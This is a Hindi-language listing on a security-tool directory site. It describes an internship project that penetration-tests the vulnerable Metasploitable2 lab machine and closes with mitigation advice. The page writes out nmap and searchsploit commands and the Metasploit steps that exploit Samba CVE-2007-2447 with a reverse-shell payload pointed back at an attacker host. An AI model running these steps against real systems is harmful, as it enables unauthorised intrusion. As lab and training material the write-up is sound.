Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Penetration-Testing-on-Metasploitable2 — Kali Linux बनाम Metasploitable2 का उपयोग करने वाला व्यावहारिक पेंटेस्ट प्रोजेक्ट। पूर्ण कार्यप्रवाह शामिल है: Nmap स्कैनिंग, गणना, Metasploit शोषण (Samba CVE-2007-2447), पोस्ट-एक्सप्लॉइटेशन सत्यापन और शमन चरण। रिपॉजिटरी में आक्रामक तकनीकों और रक्षात्मक अनुशंसाओं दोनों को दिखाने वाले कमांड, आउटपुट और रिपोर्ट शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/seifeldienahmad/penetration-testing-on-metasploitable2
टोहीभेद्यता स्कैनरनेटवर्क मैपिंगभेद्यता विश्लेषणशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
GitHubseifeldienahmad/penetration-testing-on-metasploitable2

Penetration-Testing-on-Metasploitable2

रिपॉजिटरी देखेंवेबसाइट
140 साल पहलेअभी तक समीक्षित नहीं

विवरण

Kali Linux बनाम Metasploitable2 का उपयोग करने वाला व्यावहारिक पेंटेस्ट प्रोजेक्ट। पूर्ण कार्यप्रवाह शामिल है: Nmap स्कैनिंग, गणना, Metasploit शोषण (Samba CVE-2007-2447), पोस्ट-एक्सप्लॉइटेशन सत्यापन और शमन चरण। रिपॉजिटरी में आक्रामक तकनीकों और रक्षात्मक अनुशंसाओं दोनों को दिखाने वाले कमांड, आउटपुट और रिपोर्ट शामिल हैं।

साझा करें

इंटर्नशिप प्रोजेक्ट 2 — मेटास्प्लॉइटेबल2 पर पेनिट्रेशन टेस्टिंग

  • सारांश: यह प्रोजेक्ट एक पूर्ण पेनिट्रेशन टेस्टिंग वर्कफ़्लो प्रदर्शित करता है: रिकॉनिसेंस, एन्यूमरेशन, एक्सप्लॉइटेशन, पोस्ट-एक्सप्लॉइटेशन वैलिडेशन, और शमन अनुशंसाएँ। उपयोग किया गया लक्ष्य Metasploitable2 है और आक्रमण बॉक्स Kali Linux है।

  • उपकरण: Kali Linux (हमलावर) Nmap (रिकॉन) Metasploit Framework (एक्सप्लॉइटेशन) SearchSploit / Exploit-DB (ट्राइएज)

किए गए चरण:

  1. स्कैनिंग: sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x पहचानी गई सेवाएँ (उदाहरण): vsftpd 2.3.4 (पोर्ट 21 बैनर), Samba smbd 3.x (पोर्ट 445)।
  2. एन्यूमरेशन और ट्राइएज: searchsploit --nmap scans/target.xml searchsploit samba 3.0.20 संभावित एक्सप्लॉइट से सेवाओं का मिलान किया (vsftpd बैकडोर, Samba username-map)।
  3. एक्सप्लॉइटेशन
  • vsftpd बैकडोर (CVE-2011-2523) का प्रयास किया गया — Nmap बैनर मौजूद था लेकिन सेवा अनुत्तरदायी; एक्सप्लॉइट ने कोई सत्र नहीं बनाया।
  • Samba (CVE-2007-2447) का सफलतापूर्वक शोषण किया गया: msfconsole use exploit/multi/samba/usermap_script set RHOSTS 192.168.x.x set payload cmd/unix/reverse set LHOST <kali-ip> set LPORT 4444 exploit इंटरैक्टिव शेल प्राप्त किया और उपयोगकर्ता संदर्भ को मान्य किया।
  1. पोस्ट-एक्सप्लॉइटेशन
  • सिस्टम जानकारी सत्यापित की: id uname -a
  • साक्ष्य और स्क्रीनशॉट एकत्र किए।
  1. शमन अनुशंसाएँ
  • नियमित स्कैनिंग और संपत्ति सूची।
  • तत्काल पैचिंग और संस्करण उन्नयन (Samba अपडेट करें)।
  • महत्वपूर्ण पोर्ट तक पहुँच प्रतिबंधित करें (फ़ायरवॉल नियम)।
  • अप्रयुक्त सेवाओं और अनाम पहुँच को अक्षम करें।
  • शेयर और खातों पर न्यूनतम विशेषाधिकार लागू करें।
  • नेटवर्क विभाजन और लॉगिंग/मॉनिटरिंग।
  • घटना प्रतिक्रिया योजना।

परिणाम Samba एक्सप्लॉइट के माध्यम से सफलतापूर्वक एक रिमोट शेल प्राप्त किया, हमले का मार्ग दस्तावेजित किया, और एक शमन योजना तैयार की। पूर्ण लॉग और कमांड आउटपुट scans/ फ़ोल्डर में संग्रहीत हैं।

टूल डाउनलोड करें